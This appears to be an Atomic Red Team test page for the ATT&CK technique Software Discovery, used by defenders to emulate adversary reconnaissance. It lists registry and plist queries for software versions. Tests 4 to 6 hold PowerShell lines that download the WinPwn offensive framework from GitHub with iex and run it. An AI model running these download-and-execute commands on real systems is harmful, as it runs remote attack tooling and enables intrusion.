Try it using Invoke-Atomic

Software Discovery

Description from ATT&CK

Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to Exploitation for Privilege Escalation. https://www.aleksandrhovhannisyan.com/blog/how-to-add-a-copy-to-clipboard-button-to-your-jekyll-blog/

Atomic Tests

Atomic Test #1 - Find and Display Internet Explorer Browser Version

Query the registry to determine the version of internet explorer installed on the system. Upon execution, version information about internet explorer will be displayed.

Supported Platforms: windows

auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4

Inputs:

None

Attack Commands: Run with command_prompt!

1
2
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion

Atomic Test #2 - Applications Installed

Query the registry to determine software and versions installed on the system. Upon execution a table of software name and version information will be displayed.

Supported Platforms: windows

auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize

Atomic Test #3 - Find and Display Safari Browser Version

Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors

Supported Platforms: macos

auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f

Inputs:

None

Attack Commands: Run with sh!

1
2
3
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist

Atomic Test #4 - WinPwn - Dotnetsearch

Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn

Supported Platforms: windows

auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Dotnetsearch -noninteractive -consoleoutput

Atomic Test #5 - WinPwn - DotNet

Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.

Supported Platforms: windows

auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
dotnet -consoleoutput -noninteractive

Atomic Test #6 - WinPwn - powerSQL

Start PowerUpSQL Checks using powerSQL function of WinPwn

Supported Platforms: windows

auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34

Inputs:

None

Attack Commands: Run with powershell!

1
2
3
$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powerSQL -noninteractive -consoleoutput

source